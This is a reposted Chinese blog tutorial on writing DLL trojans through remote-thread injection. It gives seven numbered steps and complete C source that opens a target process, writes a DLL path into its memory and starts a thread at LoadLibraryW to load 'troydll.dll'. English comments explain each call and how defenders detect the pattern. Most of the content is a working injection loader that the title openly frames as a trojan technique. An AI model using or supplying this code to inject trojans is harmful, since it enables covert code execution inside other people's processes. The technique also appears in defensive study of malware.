
VC++DLL木马编写原理DLL远程注入

作者:admin 发布于:2012-6-30 16:43 Saturday 分类:网络转载


从DLL木马注入程序的源代码中我们可以分析出DLL木马注入的一般步骤为:
  (1)取得宿主进程(即要注入木马的进程)的进程ID dwRemoteProcessId;
  (2)取得DLL的完全路径,并将其转换为宽字符模式pszLibFileName;
  (3)利用Windows API OpenProcess打开宿主进程,应该开启下列选项:
  a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程;
  b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作;
  c.PROCESS_VM_WRITE:允许对宿主进程进行VM写。

  (4)利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间,

            并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

  (5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,

            这个函数将作为随后将启动的远程线程的入口函数;

  (6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的

            入口函数地址, 将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以令其启动指定的DLL

  (7)清理现场。
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void CheckError ( int, int, char *); //出错处理函数

// File-scope state shared between main() and CheckError(): the error path
// releases whatever is still held here, so these cannot be locals of main().
PDWORD pdwThreadId;                              // declared but never referenced in this listing
HANDLE hRemoteThread, hRemoteProcess;            // remote thread / target process handles (NULL until opened)
DWORD fdwCreate, dwStackSize, dwRemoteProcessId; // only dwRemoteProcessId is used below; the other two are unused here
PWSTR pszLibFileRemote=NULL;                     // buffer allocated inside the target process, NULL until VirtualAllocEx succeeds

// Entry point: loads a DLL into another process by creating a thread in
// that process whose start address is LoadLibraryW and whose argument is a
// path string written into the target's memory. Neither argc nor argv is read;
// the target PID and the DLL path are constants. Every failure goes through
// CheckError(), which releases the globals and terminates the process.
//
// Defender's view: the call sequence OpenProcess (thread-create + VM rights)
// -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread with a start
// address equal to LoadLibraryW is the canonical remote-thread injection
// pattern; thread-creation telemetry and the target's module list both
// expose it.
void main(int argc,char **argv)
{
 int iReturnCode;
 char lpDllFullPathName[MAX_PATH];
 WCHAR pszLibFileName[MAX_PATH]={0}; // zero-filled: the terminator of the converted path comes from here

 dwRemoteProcessId = 4000; // hard-coded target process id
 strcpy(lpDllFullPathName, "d:\\troydll.dll"); // hard-coded DLL path (ANSI)
 // Convert the ANSI path to UTF-16, since LoadLibraryW expects a wide string.
 // Only strlen() characters are converted, so the NUL terminator is not
 // produced by the conversion; it relies on the ={0} initialisation above.
 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
 lpDllFullPathName, strlen(lpDllFullPathName),
 pszLibFileName, MAX_PATH);
 CheckError(iReturnCode, 0, "MultByteToWideChar"); // 0 converted characters == failure
 
// Open the target process with exactly the rights the later calls need.
// A cross-process handle carrying this access mask is itself worth alerting on.
 hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | // needed by CreateRemoteThread
  PROCESS_VM_OPERATION | // needed by VirtualAllocEx / VirtualFreeEx
  PROCESS_VM_WRITE, // needed by WriteProcessMemory
  FALSE, dwRemoteProcessId ); // handle is not inheritable
 // Note: the HANDLE is narrowed to int for this comparison; the same narrowing
 // is applied to every handle/pointer check below.
 CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
 
// Size of the wide path including its terminator, in bytes.
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
 // Commit a read/write region of that size inside the target process.
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
 CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
 
// Copy the wide path into the region just allocated in the target.
 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
 CheckError(iReturnCode, false, "WriteProcessMemory");
 
// Resolve LoadLibraryW in *this* process and reuse the address as the thread
// start routine in the target; nothing here verifies that the address is the
// same in the other process.
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
 
// Start a thread in the target at LoadLibraryW with the remote path buffer as
// its single argument. From the target's side this is a new thread whose start
// address is a kernel32 export and whose parameter points at freshly written
// memory - the observable signature of this technique.
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
 CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
 
// Block without a timeout until the remote thread (i.e. LoadLibraryW) returns.
 WaitForSingleObject(hRemoteThread, INFINITE);
 
// Cleanup: release the remote buffer and both handles. Mirrors the release
// sequence in CheckError(); the NULL guards matter here only for the remote
// buffer, since the handles are non-NULL by this point.
 if (pszLibFileRemote != NULL)
 {
  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
 }
 if (hRemoteThread != NULL)
 {
  CloseHandle(hRemoteThread );
 }
 if (hRemoteProcess!= NULL)
 {
  CloseHandle(hRemoteProcess);
 }
}

// Error handler CheckError(): when iReturnCode equals iErrorCode (the value
// the caller treats as failure - 0, NULL or false), print pErrorMsg together
// with GetLastError(), release whatever the file-scope globals still hold,
// and terminate. Otherwise it is a no-op.
//
// pErrorMsg is only printed through "%s", so it is never used as a format
// string. Note that the process exits with status 0 even though an error
// occurred, so a caller or script cannot distinguish failure from success by
// exit code.
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
 if(iReturnCode==iErrorCode)
 {
  printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
  // Release in the same order as main(): remote buffer first (needs the
  // process handle), then the thread handle, then the process handle.
  // Each global is NULL until the corresponding call in main() succeeded.
  if (pszLibFileRemote != NULL)
  {
   VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
  }
  if (hRemoteThread != NULL)
  {
   CloseHandle(hRemoteThread );
  }
  if (hRemoteProcess!= NULL)
  {
   CloseHandle(hRemoteProcess);
  }
  exit(0); // terminates the whole program; control never returns to the caller
 }
}

